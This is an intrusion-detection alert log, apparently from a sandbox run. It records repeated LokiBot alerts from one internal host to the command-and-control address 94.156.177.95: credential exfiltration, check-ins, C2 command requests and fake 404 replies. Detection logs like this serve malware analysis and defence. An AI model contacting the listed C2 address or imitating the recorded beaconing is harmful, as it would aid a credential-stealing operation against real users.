2024-11-15T18:14:30.675330+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49740	94.156.177.95	80	TCP
2024-11-15T18:14:30.795104+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49741	94.156.177.95	80	TCP
2024-11-15T18:14:30.795104+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49741	94.156.177.95	80	TCP
2024-11-15T18:14:30.795104+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49741	94.156.177.95	80	TCP
2024-11-15T18:14:31.757247+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49741	94.156.177.95	80	TCP
2024-11-15T18:14:31.757247+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49741	94.156.177.95	80	TCP
2024-11-15T18:14:31.762597+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49741	TCP
2024-11-15T18:14:31.919895+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49742	94.156.177.95	80	TCP
2024-11-15T18:14:31.919895+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49742	94.156.177.95	80	TCP
2024-11-15T18:14:31.919895+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49742	94.156.177.95	80	TCP
2024-11-15T18:14:32.891366+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49742	94.156.177.95	80	TCP
2024-11-15T18:14:32.891366+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49742	94.156.177.95	80	TCP
2024-11-15T18:14:32.896680+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49742	TCP
2024-11-15T18:14:33.059121+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49743	94.156.177.95	80	TCP
2024-11-15T18:14:33.059121+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49743	94.156.177.95	80	TCP
2024-11-15T18:14:33.059121+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49743	94.156.177.95	80	TCP
2024-11-15T18:14:34.034011+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49743	94.156.177.95	80	TCP
2024-11-15T18:14:34.034011+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49743	94.156.177.95	80	TCP
2024-11-15T18:14:34.039378+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49743	TCP
2024-11-15T18:14:34.179211+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49744	94.156.177.95	80	TCP
2024-11-15T18:14:34.179211+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49744	94.156.177.95	80	TCP
2024-11-15T18:14:34.179211+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49744	94.156.177.95	80	TCP
2024-11-15T18:14:35.159054+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49744	94.156.177.95	80	TCP
2024-11-15T18:14:35.159054+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49744	94.156.177.95	80	TCP
2024-11-15T18:14:35.164579+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49744	TCP
2024-11-15T18:14:35.327062+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49745	94.156.177.95	80	TCP
2024-11-15T18:14:35.327062+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49745	94.156.177.95	80	TCP
2024-11-15T18:14:35.327062+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49745	94.156.177.95	80	TCP
2024-11-15T18:14:36.284393+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49745	94.156.177.95	80	TCP
2024-11-15T18:14:36.284393+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49745	94.156.177.95	80	TCP
2024-11-15T18:14:36.290489+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49745	TCP
2024-11-15T18:14:36.470587+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49746	94.156.177.95	80	TCP
2024-11-15T18:14:36.470587+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49746	94.156.177.95	80	TCP
2024-11-15T18:14:36.470587+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49746	94.156.177.95	80	TCP
2024-11-15T18:14:37.443015+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49746	94.156.177.95	80	TCP
2024-11-15T18:14:37.443015+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49746	94.156.177.95	80	TCP
2024-11-15T18:14:37.448794+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49746	TCP
2024-11-15T18:14:37.613187+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49747	94.156.177.95	80	TCP
2024-11-15T18:14:37.613187+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49747	94.156.177.95	80	TCP
2024-11-15T18:14:37.613187+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49747	94.156.177.95	80	TCP
2024-11-15T18:14:38.600814+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49747	94.156.177.95	80	TCP
2024-11-15T18:14:38.600814+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49747	94.156.177.95	80	TCP
2024-11-15T18:14:38.608490+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49747	TCP
2024-11-15T18:14:38.767433+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49748	94.156.177.95	80	TCP
2024-11-15T18:14:38.767433+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49748	94.156.177.95	80	TCP
2024-11-15T18:14:38.767433+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49748	94.156.177.95	80	TCP
2024-11-15T18:14:39.761618+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49748	94.156.177.95	80	TCP
2024-11-15T18:14:39.761618+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49748	94.156.177.95	80	TCP
2024-11-15T18:14:39.766951+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49748	TCP
2024-11-15T18:14:39.915789+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49749	94.156.177.95	80	TCP
2024-11-15T18:14:39.915789+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49749	94.156.177.95	80	TCP
2024-11-15T18:14:39.915789+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49749	94.156.177.95	80	TCP
2024-11-15T18:14:40.866807+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49749	94.156.177.95	80	TCP
2024-11-15T18:14:40.866807+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49749	94.156.177.95	80	TCP
2024-11-15T18:14:40.872268+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49749	TCP
2024-11-15T18:14:41.021819+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49750	94.156.177.95	80	TCP
2024-11-15T18:14:41.021819+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49750	94.156.177.95	80	TCP
2024-11-15T18:14:41.021819+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49750	94.156.177.95	80	TCP
2024-11-15T18:14:42.016291+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49750	94.156.177.95	80	TCP
2024-11-15T18:14:42.016291+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49750	94.156.177.95	80	TCP
2024-11-15T18:14:42.021787+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49750	TCP
2024-11-15T18:14:42.169695+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49751	94.156.177.95	80	TCP
2024-11-15T18:14:42.169695+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49751	94.156.177.95	80	TCP
2024-11-15T18:14:42.169695+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49751	94.156.177.95	80	TCP
2024-11-15T18:14:43.119045+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49751	94.156.177.95	80	TCP
2024-11-15T18:14:43.119045+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49751	94.156.177.95	80	TCP
2024-11-15T18:14:43.124310+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49751	TCP
2024-11-15T18:14:43.295006+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49752	94.156.177.95	80	TCP
2024-11-15T18:14:43.295006+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49752	94.156.177.95	80	TCP
2024-11-15T18:14:43.295006+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49752	94.156.177.95	80	TCP
2024-11-15T18:14:44.288553+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49752	94.156.177.95	80	TCP
2024-11-15T18:14:44.288553+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49752	94.156.177.95	80	TCP
2024-11-15T18:14:44.294140+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49752	TCP
2024-11-15T18:14:44.446888+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49753	94.156.177.95	80	TCP
2024-11-15T18:14:44.446888+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49753	94.156.177.95	80	TCP
2024-11-15T18:14:44.446888+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49753	94.156.177.95	80	TCP
2024-11-15T18:14:45.436270+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49753	94.156.177.95	80	TCP
2024-11-15T18:14:45.436270+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49753	94.156.177.95	80	TCP
2024-11-15T18:14:45.441546+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49753	TCP
2024-11-15T18:14:45.590810+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49754	94.156.177.95	80	TCP
2024-11-15T18:14:45.590810+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49754	94.156.177.95	80	TCP
2024-11-15T18:14:45.590810+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49754	94.156.177.95	80	TCP
2024-11-15T18:14:46.563404+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49754	94.156.177.95	80	TCP
2024-11-15T18:14:46.563404+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49754	94.156.177.95	80	TCP
2024-11-15T18:14:46.568842+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49754	TCP
2024-11-15T18:14:46.714498+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49755	94.156.177.95	80	TCP
2024-11-15T18:14:46.714498+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49755	94.156.177.95	80	TCP
2024-11-15T18:14:46.714498+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49755	94.156.177.95	80	TCP
2024-11-15T18:14:47.661088+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49755	94.156.177.95	80	TCP
2024-11-15T18:14:47.661088+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49755	94.156.177.95	80	TCP
2024-11-15T18:14:47.666396+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49755	TCP
2024-11-15T18:14:47.882051+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49756	94.156.177.95	80	TCP
2024-11-15T18:14:47.882051+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49756	94.156.177.95	80	TCP
2024-11-15T18:14:47.882051+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49756	94.156.177.95	80	TCP
2024-11-15T18:14:48.863645+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49756	94.156.177.95	80	TCP
2024-11-15T18:14:48.863645+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49756	94.156.177.95	80	TCP
2024-11-15T18:14:48.868839+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49756	TCP
2024-11-15T18:14:49.034112+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49757	94.156.177.95	80	TCP
2024-11-15T18:14:49.034112+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49757	94.156.177.95	80	TCP
2024-11-15T18:14:49.034112+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49757	94.156.177.95	80	TCP
2024-11-15T18:14:49.974935+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49757	94.156.177.95	80	TCP
2024-11-15T18:14:49.974935+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49757	94.156.177.95	80	TCP
2024-11-15T18:14:49.980312+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49757	TCP
2024-11-15T18:14:50.182971+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49758	94.156.177.95	80	TCP
2024-11-15T18:14:50.182971+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49758	94.156.177.95	80	TCP
2024-11-15T18:14:50.182971+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49758	94.156.177.95	80	TCP
2024-11-15T18:14:51.170948+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49758	94.156.177.95	80	TCP
2024-11-15T18:14:51.170948+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49758	94.156.177.95	80	TCP
2024-11-15T18:14:51.176298+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49758	TCP
2024-11-15T18:14:51.319509+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49759	94.156.177.95	80	TCP
2024-11-15T18:14:51.319509+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49759	94.156.177.95	80	TCP
2024-11-15T18:14:51.319509+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49759	94.156.177.95	80	TCP
2024-11-15T18:14:52.291246+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49759	94.156.177.95	80	TCP
2024-11-15T18:14:52.291246+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49759	94.156.177.95	80	TCP
2024-11-15T18:14:52.296733+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49759	TCP
2024-11-15T18:14:52.454053+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49760	94.156.177.95	80	TCP
2024-11-15T18:14:52.454053+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49760	94.156.177.95	80	TCP
2024-11-15T18:14:52.454053+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49760	94.156.177.95	80	TCP
2024-11-15T18:14:53.435601+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49760	94.156.177.95	80	TCP
2024-11-15T18:14:53.435601+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49760	94.156.177.95	80	TCP
2024-11-15T18:14:53.441225+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49760	TCP
2024-11-15T18:14:53.594421+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49761	94.156.177.95	80	TCP
2024-11-15T18:14:53.594421+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49761	94.156.177.95	80	TCP
2024-11-15T18:14:53.594421+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49761	94.156.177.95	80	TCP
2024-11-15T18:14:54.533464+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49761	94.156.177.95	80	TCP
2024-11-15T18:14:54.533464+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49761	94.156.177.95	80	TCP
2024-11-15T18:14:54.538826+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49761	TCP
2024-11-15T18:14:54.694505+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49762	94.156.177.95	80	TCP
2024-11-15T18:14:54.694505+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49762	94.156.177.95	80	TCP
2024-11-15T18:14:54.694505+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49762	94.156.177.95	80	TCP
2024-11-15T18:14:56.696356+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49762	94.156.177.95	80	TCP
2024-11-15T18:14:56.696356+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49762	94.156.177.95	80	TCP
2024-11-15T18:14:56.701607+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49762	TCP
2024-11-15T18:14:56.897576+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49763	94.156.177.95	80	TCP
2024-11-15T18:14:56.897576+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49763	94.156.177.95	80	TCP
2024-11-15T18:14:56.897576+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49763	94.156.177.95	80	TCP
2024-11-15T18:14:57.891299+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49763	94.156.177.95	80	TCP
2024-11-15T18:14:57.891299+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49763	94.156.177.95	80	TCP
2024-11-15T18:14:57.896447+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49763	TCP
2024-11-15T18:14:58.049519+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49765	94.156.177.95	80	TCP
2024-11-15T18:14:58.049519+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49765	94.156.177.95	80	TCP
2024-11-15T18:14:58.049519+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49765	94.156.177.95	80	TCP
2024-11-15T18:14:58.995981+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49765	94.156.177.95	80	TCP
2024-11-15T18:14:58.995981+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49765	94.156.177.95	80	TCP
2024-11-15T18:14:59.001252+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49765	TCP
2024-11-15T18:14:59.161814+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49767	94.156.177.95	80	TCP
2024-11-15T18:14:59.161814+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49767	94.156.177.95	80	TCP
2024-11-15T18:14:59.161814+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49767	94.156.177.95	80	TCP
2024-11-15T18:15:00.107047+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49767	94.156.177.95	80	TCP
2024-11-15T18:15:00.107047+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49767	94.156.177.95	80	TCP
2024-11-15T18:15:00.112387+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49767	TCP
2024-11-15T18:15:00.310997+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49773	94.156.177.95	80	TCP
2024-11-15T18:15:00.310997+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49773	94.156.177.95	80	TCP
2024-11-15T18:15:00.310997+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49773	94.156.177.95	80	TCP
2024-11-15T18:15:01.275023+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49773	94.156.177.95	80	TCP
2024-11-15T18:15:01.275023+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49773	94.156.177.95	80	TCP
2024-11-15T18:15:01.280238+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49773	TCP
2024-11-15T18:15:01.433270+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49779	94.156.177.95	80	TCP
2024-11-15T18:15:01.433270+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49779	94.156.177.95	80	TCP
2024-11-15T18:15:01.433270+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49779	94.156.177.95	80	TCP
2024-11-15T18:15:02.623425+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49779	94.156.177.95	80	TCP
2024-11-15T18:15:02.623425+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49779	94.156.177.95	80	TCP
2024-11-15T18:15:02.623583+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49779	TCP
2024-11-15T18:15:02.774194+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49785	94.156.177.95	80	TCP
2024-11-15T18:15:02.774194+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49785	94.156.177.95	80	TCP
2024-11-15T18:15:02.774194+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49785	94.156.177.95	80	TCP
2024-11-15T18:15:03.759207+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49785	94.156.177.95	80	TCP
2024-11-15T18:15:03.759207+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49785	94.156.177.95	80	TCP
2024-11-15T18:15:03.765726+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49785	TCP
2024-11-15T18:15:03.942454+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49795	94.156.177.95	80	TCP
2024-11-15T18:15:03.942454+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49795	94.156.177.95	80	TCP
2024-11-15T18:15:03.942454+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49795	94.156.177.95	80	TCP
2024-11-15T18:15:04.924439+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49795	94.156.177.95	80	TCP
2024-11-15T18:15:04.924439+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49795	94.156.177.95	80	TCP
2024-11-15T18:15:04.930007+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49795	TCP
2024-11-15T18:15:05.073942+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49802	94.156.177.95	80	TCP
2024-11-15T18:15:05.073942+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49802	94.156.177.95	80	TCP
2024-11-15T18:15:05.073942+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49802	94.156.177.95	80	TCP
2024-11-15T18:15:06.034036+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49802	94.156.177.95	80	TCP
2024-11-15T18:15:06.034036+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49802	94.156.177.95	80	TCP
2024-11-15T18:15:06.039433+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49802	TCP
2024-11-15T18:15:06.199202+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49808	94.156.177.95	80	TCP
2024-11-15T18:15:06.199202+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49808	94.156.177.95	80	TCP
2024-11-15T18:15:06.199202+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49808	94.156.177.95	80	TCP
2024-11-15T18:15:07.183769+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49808	94.156.177.95	80	TCP
2024-11-15T18:15:07.183769+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49808	94.156.177.95	80	TCP
2024-11-15T18:15:07.188929+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49808	TCP
2024-11-15T18:15:07.370279+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49813	94.156.177.95	80	TCP
2024-11-15T18:15:07.370279+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49813	94.156.177.95	80	TCP
2024-11-15T18:15:07.370279+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49813	94.156.177.95	80	TCP
2024-11-15T18:15:08.327887+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49813	94.156.177.95	80	TCP
2024-11-15T18:15:08.327887+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49813	94.156.177.95	80	TCP
2024-11-15T18:15:08.333135+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49813	TCP
2024-11-15T18:15:08.480132+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49818	94.156.177.95	80	TCP
2024-11-15T18:15:08.480132+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49818	94.156.177.95	80	TCP
2024-11-15T18:15:08.480132+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49818	94.156.177.95	80	TCP
2024-11-15T18:15:09.444469+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49818	94.156.177.95	80	TCP
2024-11-15T18:15:09.444469+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49818	94.156.177.95	80	TCP
2024-11-15T18:15:09.449703+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49818	TCP
2024-11-15T18:15:09.759213+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49825	94.156.177.95	80	TCP
2024-11-15T18:15:09.759213+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49825	94.156.177.95	80	TCP
2024-11-15T18:15:09.759213+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49825	94.156.177.95	80	TCP
2024-11-15T18:15:10.714557+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49825	94.156.177.95	80	TCP
